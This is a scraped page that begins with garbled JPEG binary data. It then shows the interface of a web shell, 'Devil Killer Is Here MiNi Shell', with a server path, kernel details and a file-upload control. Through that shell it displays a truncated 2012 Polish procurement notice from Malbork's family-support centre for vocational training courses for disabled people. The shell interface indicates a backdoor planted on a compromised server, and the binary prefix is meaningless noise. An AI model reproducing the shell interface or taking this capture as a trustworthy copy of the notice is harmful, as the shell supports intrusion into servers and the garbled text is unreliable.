JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/165487-N-2012.html

<p class="kh_header"><b>Malbork: Szkolenie/kursy  realizowane w ramach projektu systemowego pn. My też mamy prawo współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego, Poddziałanie 7.1.2 Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 165487 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , plac Słowiański 17, 82-200 Malbork, woj. pomorskie, tel. 55 647 15 45, faks 55 647 15 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiat.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie/kursy  realizowane w ramach projektu systemowego pn. My też mamy prawo współfinansowanego przez Unię Europejską w ramach  Europejskiego Funduszu Społecznego, Poddziałanie 7.1.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów-szkoleń dla   osób niepełnosprawnych i wychowanków rodzin zastępczych, placówek opiekuńczo wychowawczych zagrożonych wykluczeniem społecznym, będących w wieku aktywności zawodowej 16-64 lat, korzystających ze świadczeń pomocy społecznej w rozumieniu przepisów ustawy o pomocy społecznej lub korzystających na okoliczność projektu, mieszkających na terenie powiatu malborskiego będących uczestnikami projektu systemowego My też mamy prawo , współfinansowanego przez Unie Europejską w ramach środków Europejskiego Funduszu Społecznego, Pododdziale 7.1.2 Programu Operacyjnego Kapitał Ludzki.
2.Kursy-szkolenia obejmują 22 osoby w tym: 20 osób niepełnosprawnych.   
3.Na cenę składa się realizacja wymienionych szkoleń:
1. Szkolenie - Opiekun osób starszych
Wymagany, minimalny zakres kursu:

a)Zasady działania i organizacji w zakresie opieki starszych, chorych i niepełnosprawnych,
Poradnik savoir-vivre wobec osób starszych,
b)Przyczyny starości, proces starzenia się - omówienie sytuacji i problemów osób starszych, niepełnosprawnych i chorych,
c)Zadania pomocy społecznej w zakresie pomocy instytucjonalnej. Omówienie zasad działania, umieszczania oraz pobytu w domach pomocy społecznej osób chorych, niepełnosprawnych i starych.
d)Zajęcia praktyczne w DPS:
-Zapoznanie z organizacją DPS, obiektem, omówienie zakresu podejmowanych zadań i działań wobec osób przebywających w DPS - indywidualne przedstawienie zakresów czynności,
-Omówienie jednostek chorobowych najczęściej występujących u osób podopiecznych - nadciśnienie, cukrzyca, demencja starczą,
-Inkontynencja - przyczyny, zapobieganie, pomoc osobom z tym schorzeniem, techniki zabezpieczeń. Zasady zapobiegania chorych, starszych i niepełnosprawnych ludzi, środki pomocnicze oraz sprzęt w oparciu o przepisy i wytyczne NFZ oraz PFRON,
-Higiena chorych i osób w podeszłym wieku. Odleżyny - profilaktyka, leczenie. Współpraca w tym zakresie z lekarzem i pielęgniarką środowiskową.
-Pomoc ludziom pod nadzorem opiekunów, higiena mieszkańców, zmiany po ścieli, karmienie osób wymagających pomocy w tym zakresie, rozmowy z mieszkańcami,
-Wykonywanie czynności pielęgnacyjnych, opieka nad mieszkańcami,
-pierwsza pomoc - podstawowe zasady udzielania pomocy.

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu szkolenia opiekun osób starszych
Liczba godzin - 1 grupa - łącznie 180 godzin dydaktycznych
Liczba uczestników - 2 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji -  do 23 listopada 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

2. Kurs - Pracownik ochrony fizycznej osób i mienia
Wymagany, minimalny zakres kursu:

a)Prawo, ustawy, organizacja,
b)etyka i socjologia,
c)strzelanie, budowa broni,
d)sztuka walki,
e)udzielanie pierwszej pomocy przedlekarskiej,
f)ćwiczenia - sztuka walki,
g)ćwiczenia - strzelanie,
h)ćwiczenia - wizyty studyjne w obiektach chronionych i agencji ochrony,
i)ćwiczenia - udzielanie pomocy przedlekarskiej.

Prowadzący: Wykładowcy posiadający doświadczenie w prowadzeniu szkolenia Pracownik ochrony fizycznej osób i mienia
Liczba godzin - 1 grupa - łącznie 70 godzin dydaktycznych
Liczba uczestników - 3 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopad 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

3. Kurs - Fryzjerstwo
Wymagany, minimalny zakres kursu:

a)Wiadomości podstawowe: specyfika zawodu fryzjera, higiena w miejscu pracy, dezynfekcja i sterylizacja, choroby zawodowe, zasady BHP, organizacja pracy w salonie fryzjerskim, standardowe wyposażenie salonu fryzjerskiego, profesjonalne stanowiska pracy,
b)specyfikacja zawodu fryzjerskiego,
c)produkty fryzjerskie,
d)kosmetyka, struktura i właściwości włosa,
e)profesjonalna obsługa klienta
f)techniki fryzjerskie, strzyżenie teoria, omówienie narzędzi fryzjerskich,
g)podstawowe techniki strzyżeń - praktyka,
h)ondulacja,
i)koloryzacja,
j)stylizacja.

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu szkolenia fryzjerstwo
Liczba godzin - łącznie 250 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do23 listopada 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

4. Kurs - Język szwedzki na poziomie podstawowym
Wymagany, minimalny zakres kursu:
a)Kurs prowadzony przede wszystkim metodą komunikacyjną, która jest skoncentrowana na jak najszybszym swobodnym komunikowaniu się,
b)Wykorzystywanie różnych sposobów stymulacji językowej, ćwiczenia bazujące na pamięci wzrokowej, ruchowej i słuchowej.
Prowadzący: Lektor/filolog posiadający doświadczenie w prowadzeniu kursu z języka szwedzkiego
Liczba godzin - 1 grupa - łącznie 60 godzin dydaktycznych
Liczba uczestników - 2 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

5. Kurs - Kadry i płace
Wymagany, minimalny zakres kursu

a)prawo pracy,
b)rozliczanie wynagrodzeń, 
c)podatek dochodowy od osób fizycznych, 
d)ubezpieczenia społeczne i zdrowotne, 
e)rozliczenia podróży służbowych, 
f)program PŁATNIK, 
g)obsługa programu kadrowo - płacowego Symfonia Kadry i płace,
h)wykorzystanie programu Excel w tworzeniu listy płac.

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu szkolenia kadry i płace
Liczba godzin - 1 grupa - łącznie 120 godzin dydaktycznych
Liczba uczestników - 3 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

6. Kurs - Podstawy księgowości
Wymagany, minimalny zakres kursu

a)podstawy i organizacja rachunkowości, omówienie ustaw o rachunkowości, o podatku dochodowym od osób fizycznych, o podatku dochodowym od osób prawnych, od towarów i usług, Kodeks Pracy, podstawowe definicje związane z działalnością gospodarczą i ewidencją księgową,
b)Zasady ewidencji zdarzeń gospodarczych w oparciu o zakładowy plan kont.
c)Obrót towarowy i materiałowy,
d)Rozrachunki z kontrahentami oraz rozliczenia zobowiązać z tytułu podatków i ubezpieczeń społecznych, deklaracje podatkowe,
e)Zasady ewidencji zdarzeń gospodarczych w oparciu o podatkową księgę przychodów i rozchodów, metody rozliczania kosztów i dochodów,
f)Zasady ewidencji zdarzeń gospodarczych w oparciu o PKRiR,
g)Ewidencje w działalności gospodarczej, środków trwałych i wyposażenia, magazynowe, pracownicze, przebiegu pojazdów, ewidencja VAT,
h)Klasyfikacja środków trwałych, metody amortyzacji, czynności księgowe przy zakupie środka trwałego,
i)Dokumentacja pracownicza w firmie, omówienie specyfiki, lista płąc, krata wynagrodzeń,
j)Zajęcia praktyczne.

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu szkolenia księgowości
Liczba godzin - łącznie 120 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

7. Szkolenie - Dogoterapia
Wymagany, minimalny zakres kursu
a)Historia i metodyka dogoterapii,
b)Pedagogika i psychologia rozwojowa 
-rozwój dziecka
-zaburzenia rozwojowe
-niepełnosprawność intelektualna
-autyzm
c)Pies w dogoterapii 
-wybór psa do dogoterapii 
-praca ze szczeniakiem 
-szkolenie
-behawior
-sygnały uspokajające 
-warsztaty klikerowe
-podstawy weterynarii
d)Wstęp do fizjoterapii
-fizjologia człowieka
-uszkodzenia mózgu i postępowanie terapeutyczne
-najczęstrze jednostki chorobowe
e)Warsztaty w placówce, wprowadzenie do praktyk,
f)Pedagogika i elementy psychologii: zagadnienia z zakresu: 
-pedagogiki specjalnej 
-pedagogiki przedszkolna i wczesnoszkolna 
-pedagogiki zabawy 
-psychologi klinicznej
-psychologii rozwojowej 
g)Szkolenie i behawior psów - teoria
-szkolenie metodą klikerową 
-znaczenie stresu w procesie nauki 
-czynniki stresujące w pracy psa terapeuty
-bhp pracy psa
h)Rehabilitacja 
i)Dogoterapia 
-zajęcia praktyczne 
-warsztaty
-metodyka prowadzenia zajęć - teoria
j)Szkolenie psów - zajęcia praktyczne 
-blok posłuszeństwo 
-blok sztuczkowy 
Prowadzący: Instruktor szkolenia psów/dogoterapeuta posiadający doświadczenie w prowadzeniu szkoleń z zakresu dogoterapii
Liczba godzin - łącznie 115 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych
niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

8. Kurs - Masażu I st. o profilu rozszerzonym
Wymagany, minimalny zakres kursu

a)Anatomia funkcjonalna człowieka.
b)Wprowadzenie do masażu - zagadnienia teoretyczne obejmujące : 
1. Rys historyczny,
2. Techniki masażu i ich oddziaływanie,
3. Wskazania i przeciwwskazania do masażu,
4. Wpływ masażu na organizm człowieka,
5. Metodyka stosowania masażu.
c)Część praktyczna I - masaż klasyczny:
1. Opracowanie kończyny górnej (ręka, przedramie, ramię), twarz, kark, kończyna dolna, obręcz kończyny dolnej, masaż odcinkowy lędźwiowo-krzyżowy LS, piersiowy Th, szyjny S, grzbiet, obręcz kończyny górnej, klatka piersiowa, brzuch,
2. Opracowanie masażu całościowego,
3. Metodyka badania pacjenta: zmiany chorobowe, wywiad z pacjentem, diagnoza stanu zdrowia.
d)Część praktyczna II - profil rozszerzony:
1. Masaż sportowy,
2. Masaż izometryczny,
3. Masaż kontralateralny,
4. Masaż relaksacyjny,
5. Masaż odchudzający, modelujący.

Prowadzący: fizjoterapeuta/rehabilitant z doświadczeniem zawodowym i dydaktycznym
Liczba godzin - łącznie 120 godzin dydaktycznych
Liczba uczestników - 4 osoby - w tym 3 osoby niepełnosprawne (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork. 
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

9. Kurs Krawiectwa
Wymagany, minimalny zakres kursu

a)Maszyny do szycia, overlock, rodzaje szwów maszynowych i     ich stosowanie
b)Nauka szycia ręcznego
c)Nauka korzystania z żurnali, nauka dopasowywania     wykrojów do figury
d)Układy form, krojenie odzieży
e)Wykonywanie konstrukcji odzieży podstawowej
f)Szycie odzieży miarowej o prostych krojach (spódnica,     spodnie)
g)Nauka szycia różnych typów kieszeni: cięte z plisami, w szwie, nakładane
h)Szycie kołnierzy; typ koszulowy, wykładany, szalowy, z klapami
i)Szycie odzieży z zastosowaniem podszewek (żakiet,     spódnica, sukienka, spodnie
j)Stopniowanie szablonów
k)Modelowanie na płasko i na manekinie
l)Rysunek żurnalowy (postać statyczna, dynamiczna)
m)Typy sylwetek, odstępstwa od standardowych rozmiarów
n)Wykorzystanie teorii koloru w projektowaniu fasonów ubioru
o)Sztuka kształtowania sylwetki poprzez krój, kolor, fakturę tkaniny

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu szkolenia krawiectwa
Liczba godzin - łącznie 200 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork. 
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

10. Kurs języka niemieckiego na poziomie podstawowym
Wymagany, minimalny zakres kursu
a)Kurs prowadzony przede wszystkim metodą komunikacyjną, która jest skoncentrowana na jak najszybszym swobodnym komunikowaniu się,
b)Wykorzystywanie różnych sposobów stymulacji językowej, ćwiczenia bazujące na pamięci wzrokowej, ruchowej i słuchowej.
Prowadzący: lektor/filolog posiadający doświadczenie w prowadzaniu z kursu języka niemieckiego
Liczba godzin - łącznie 120 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork. 
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

11. Kurs Decupage
Wymagany, minimalny zakres kursu

a)Technika serwetkowa
b)Kurs decoupage klasyczny i cieniowania, malarski decoupage, cieniowania w decoupage,
c)Decoupage na szkle, decoupage na opak, decoupage odwrotny, papier ryżowy
d)Decoupage z jedno i dwuskładnikowym crackle oraz napisy
e)Klasyczny print room, malowany print room
f)Złocenie i postarzanie
g)Tójwymiarowy decoupage, pasty strukturalne
h)Patchworkowy i malowanie patchworków + szablony
i)Zdobienie jajek, bombek świątecznych
j)Decupage mozaikowy
k)Manekin krawiecki

Prowadzący: Wykładowca posiadający doświadczenie w prowadzeniu kursu decupage
Liczba godzin - łącznie 60 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork, dopuszcza się zorganizowanie szkolenia poza Malborkiem.
Koszty dojazdu - organizator szkolenia pokrywa koszty dojazdu i powrotu z Malborka do miejsca szkolenia.
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

12. Kurs - Spawacz elektryczny - Spawanie elektrodą otuloną - 111
Wymagany, minimalny zakres kursu

Szkolenie teoretyczne
a)Procesy spajania pokrewne spawaniu				
b)Rysunek techniczny w spawalnictwie				
c)Materiały podstawowe						
d)Materiały dodatkowe						
e)Podstawy elektrotechniki						
f)Urządzenia i sprzęt do spawania					
g)Technika i technologia spawania					
h)Niezgodności spawalnicze, kontrola i badania złączy spawanych		
i)Konstrukcje spawane jakość w spawalnictwie				
j)Szkolenie,egzaminowanie,kwalifikacje,certyfikowanie,UPR.spawalnicze	
k)Przepisy, wytyczne i normy dotyczące spawalnictwa
Szkolenie praktyczne
l)Instruktaż wstępny
m)Ćwiczenia	
Prowadzący: Wykładowca posiadający uprawnienia spawalnicze i doświadczenie w prowadzeniu kursów spawalniczych
Liczba godzin - łącznie 164 godzin dydaktycznych
Liczba uczestników - 1 osoba
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

13. Kurs - Hydraulik - monter instalacji wodociągowych i kanalizacyjnych
Wymagany, minimalny zakres kursu

a)Projekty hydrauliczne na budowach
b)Sporządzanie zapotrzebowania materiałowego
c)Urządzenia i maszyny
d)Organizacja robót
e)Instalacja wodociągowa
f)Instalacja kanalizacyjna
g)Remonty

Prowadzący: Wykładowca posiadający uprawnienia czeladnicze i doświadczenie w prowadzeniu kursów hydraulicznych
Liczba godzin - łącznie 100 godzin dydaktycznych
Liczba uczestników - 1 osoba niepełnosprawna (brak osób na wózku inwalidzkim)
Termin realizacji - do 23 listopada 2012 r.
Miejsce realizacji - Malbork
Pomoce dydaktyczne - wykonawca zobowiązany jest do zapewnienia pomocy dydaktycznych niezbędnych do prawidłowego i efektywnego przeprowadzenia kursu.

I.Obowiązki Wykonawcy

a.Opracowanie i przedstawienie Zamawiającemu przed szkoleniem szczegółowego programu/harmonogramu szkoleń/kursów. 
b.Zapewnienie uczestnikom materiałów merytorycznych i dydaktycznych. 
c.Zapewnienie wykwalifikowanej kadry trenerskiej. 
d.Zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do liczby uczestników z urządzeniami projekcyjnymi typu: projektor, ekran projekcyjny lub tablica interaktywna, flipchart. 
e.Miejsce szkolenia/kursu dostosowane dla osób niepełnosprawnych. 
f.Wykonawca zobowiązany jest do prowadzenia dokumentacji szkoleń-kursów, tj. listy obecności uczestników, dziennika zajęć, ankiet oceniających szkolenie-kurs, list potwierdzającej odbiór materiałów szkoleniowych oraz certyfikatów/zaświadczeń a także dokumentacji fotograficznej na CD z minimum 10 zdjęciami. Wykonawca przekaże Zamawiającemu kserokopię potwierdzonej za zgodność z oryginałem całości dokumentacji za daną grupę w terminie do 14 dni od jego zakończenia.
g.Wydanie zaświadczenia/certyfikatu o ukończeniu kursów/szkoleń dla uczestnika który uczęszczał przynajmniej na 80% godzin zajęć w ramach całego szkolenia/kursu.
h.Oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz nazwą projektu My też mamy prawo Powiatowego Centrum Pomocy Rodzinie w Malborku.
i.Zapewnienie bufetu kawowego ( kawa, herbata , napoje, ciastka) dla 22 uczestników projektu systemowego My też mamy prawo podanie nazwy i adresu obiektu, w którym odbędą się kursy/szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Warunek zostanie uznany za spełniony, gdy Wykonawca załączy do oferty oświadczenie o spełnianiu warunku dotyczącego posiadania aktualnego na rok 2012 wpisu do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej, w rozumieniu art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy. Oświadczenie to zostanie uznane za złożone, jeśli wykonawca złoży ogólne oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym krótszym okresie - wykonał należycie co najmniej trzy szkolenia o tematyce  określonej dla  wybranego kursu wymienionego w paragrafie 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował salą szkoleniową na terenie miasta Malbork, która pomieści do 15 osób szkolonych jednocześnie, wyposażoną na czas szkolenia w liczbę ławek i krzeseł adekwatną do liczby osób kierowanych na szkolenie, tablicę kredową i/lub suchościeralną, i/lub flipchart z zapasem kartek, projektor oraz ekran projekcyjny (lub odpowiednio przygotowana ściana) do wyświetlania prezentacji z np. MS PowerPoint (uwaga: sala szkoleniowa musi spełniać wymagania odnośnie natężenia oświetlenia, a więc pomieszczenie w którym odbywały się będą zajęcia musi być jasne - oświetlenie powinno być naturalne wspomagane oświetleniem sztucznym, odpowiednią ilość zestawów komputerowych do przeprowadzenia zajęć. Pomieszczenie musi również spełniać wymagania odpowiednią  wentylacji i temperatury, zgodnie z przepisami prawa w zakresie BHP. Wymagania w zakresie BHP spełniały będą również ławki, jak i krzesła)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
